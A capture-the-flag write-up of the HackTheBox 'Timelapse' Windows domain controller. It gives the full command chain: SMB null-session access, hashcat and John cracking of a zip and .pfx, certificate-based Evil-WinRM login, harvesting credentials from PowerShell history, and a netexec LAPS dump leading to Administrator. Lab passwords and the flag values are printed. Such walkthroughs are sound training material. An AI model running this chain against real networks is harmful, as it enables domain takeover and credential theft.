Metadata
- Platform: HackTheBox
- CTF: Timelapse
- OS: Windows
- Difficulty: Easy
Summary
An open smb share enables us to get our hands on a password-protected zip file. Once we crack it, we get access to a password-protected .pfx file, which is also crackable. By extracting the contained certificate and its corresponding authentication keys, we get a foothold on the target.
In the PowerShell of this compromised user, we can find credentials of another account. Upon further inspection, this account may access the local administrative password of the domain controller. After requesting it from the target, we compromise it entirety.
Solution
Reconnaissance
Nmap reveals that we are dealing with an AD environment.
nmap -sC -sV 10.10.11.152 -oN nmap.txt -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 18:59 CET
Nmap scan report for 10.10.11.152
Host is up (0.058s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-18 20:04:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-03-18T20:05:38+00:00; +2h04m27s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-18T20:04:54
|_ start_date: N/A
|_clock-skew: mean: 2h04m24s, deviation: 3s, median: 2h04m21sThere is one unusual thing about this target: the WinRM service on port 5985 is not available, however the one over SSL on port 5986 is. We should remember this, in case we want to utilize Evil-WinRM.
Upon inspection of the open smb share with SMBclient, which we are allowed to access in a NULL session, we find multiple files, In the Dev share specifically, there is a winrm_backup.zip file.
smbclient //10.10.11.152/Shares -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 17:39:15 2021
.. D 0 Mon Oct 25 17:39:15 2021
Dev D 0 Mon Oct 25 21:40:06 2021
HelpDesk D 0 Mon Oct 25 17:48:42 2021
smb: \Dev\> ls
. D 0 Mon Oct 25 21:40:06 2021
.. D 0 Mon Oct 25 21:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 17:46:42 2021
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 17:48:42 2021
.. D 0 Mon Oct 25 17:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 16:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 16:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 16:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 16:57:44 202User Flag
After downloading this file and trying to extract it, we notice that we require a password. Since we are in no possession of a password, we can use the zip2john utility from John The Ripper to get a hash for this file, which we can then crack with either John The Ripper or Hashcat.
hashcat hash --user -m 17220 /usr/share/wordlists/rockyou.txt
<cut>
$pkzip$1*1*2*0<cut>6452f76*$/pkzip$:supremelegacy
<cut>Once we unzip the file using the supremelegacy as the password, we get a new file legacyy_dev_auth.pfx, a certificate file, which can be used for authentication. To get a shell using this cert, we need to extract the key, as well as the certificate. There are instructions out there, which clearly describe how this can be accomplished. However, as soon as we try to follow them, we get an error.
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem
Enter Import Password:
Mac verify error: invalid password?This file is also password protected. To be able to crack it, we can use pfx2john from the John The Ripper suite. Since Hashcat does not support cracking of .pfx files, we need to use John The Ripper.
john legacyy_dev_auth.pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:00:41 DONE (2025-03-18 19:52) 0.02398g/s 77481p/s 77481c/s 77481C/s thugways..thugers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Now we can extract the cert and key from the file, using thuglegacy as the password. Let follow the instructions on this page to extract the relevant information from this file.
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
Enter Import Password:
openssl rsa -in private.pem -out private2.pem
Enter pass phrase for private.pem:
writing RSA keyAt this point we can assume that the user, for which this cert works, to be legacyy. Since this guess is only based on the file name, and we have guest based access to smb, we can enumerate the domain’s users and confirm that legacyy exists.
netexec smb 10.10.11.152 --users -p "" -u "guest" --rid-brute
<cut>
SMB 10.10.11.152 445 DC01 1601: TIMELAPSE\thecybergeek (SidTypeUser)
SMB 10.10.11.152 445 DC01 1602: TIMELAPSE\payl0ad (SidTypeUser)
SMB 10.10.11.152 445 DC01 1603: TIMELAPSE\legacyy (SidTypeUser)
SMB 10.10.11.152 445 DC01 1604: TIMELAPSE\sinfulz (SidTypeUser)
SMB 10.10.11.152 445 DC01 1605: TIMELAPSE\babywyrm (SidTypeUser)
SMB 10.10.11.152 445 DC01 1606: TIMELAPSE\DB01$ (SidTypeUser)
SMB 10.10.11.152 445 DC01 1607: TIMELAPSE\WEB01$ (SidTypeUser)
SMB 10.10.11.152 445 DC01 1608: TIMELAPSE\DEV01$ (SidTypeUser)
SMB 10.10.11.152 445 DC01 2601: TIMELAPSE\LAPS_Readers (SidTypeGroup)
SMB 10.10.11.152 445 DC01 3101: TIMELAPSE\Development (SidTypeGroup)
SMB 10.10.11.152 445 DC01 3102: TIMELAPSE\HelpDesk (SidTypeGroup)
SMB 10.10.11.152 445 DC01 3103: TIMELAPSE\svc_deploy (SidTypeUser)Finally, we can use the cert and key to log into the system via Evil-WinRM. Remember to use the -S flag to connect to port 5986, since 5985 is not available.
evil-winrm -i 10.10.11.152 -u timelapse.htb/legacyy -k private2.pem -c cert.crt -S Once we are in, it is possible to claim the user flag.
7874431c5394e74e8e12566c25941e37
Root Flag
Usually, I would now start using our credentials to gather information about the domain. But since we don’t have the required password for this account, we can not simply query the entire domain. We would first need to acquire credentials elsewhere. A straight forward place to start is the PowerShell, in case this was not deleted previously.
(Get-PSReadlineOption).HistorySavePath
C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ServerRemoteHost_history.txtWhile the file mentioned in the command output does not exist, there is another file in this folder.
cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitIt looks like the user legacyy once created the account svc_deploy, of which we now have the credentials: svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV. Before we enumerate this domain in its entirety, we should check the local access of this account.
net users svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.svc_deploy is a member of the global group LAPS_Readers. This membership allows this account to read the local Administrator password for this machine, the domain controller, meaning we can extract it. According to this web page, this can be done in several ways. In order to not introduce another very specific tool, Netexec will get the job done and dump all respective passwords.
nxc ldap "10.10.11.152" -d "timelapse.htb" -u "svc_deploy" -p 'E3R$Q62^12p7PLlC%KWaxuaV' --module laps
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.152 389 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS 10.10.11.152 389 DC01 [*] Getting LAPS Passwords
LAPS 10.10.11.152 389 DC01 Computer:DC01$ User: Password:3%+q700%/2C%+1/(cHF3#t$#With the password 3%+q700%/2C%+1/(cHF3#t$#, we can now use Evil-WinRM to get a shell as the local Administrator on the target domain controller. Again, do not forget the -S flag. Afterwards, we can claim the flag on the desktop folder of the TRX user.
evil-winrm -i 10.10.11.152 -u Administrator -p '3%+q700%/2C%+1/(cHF3#t$#' -S449dbb9b1b26c6f10e77dbd16902d674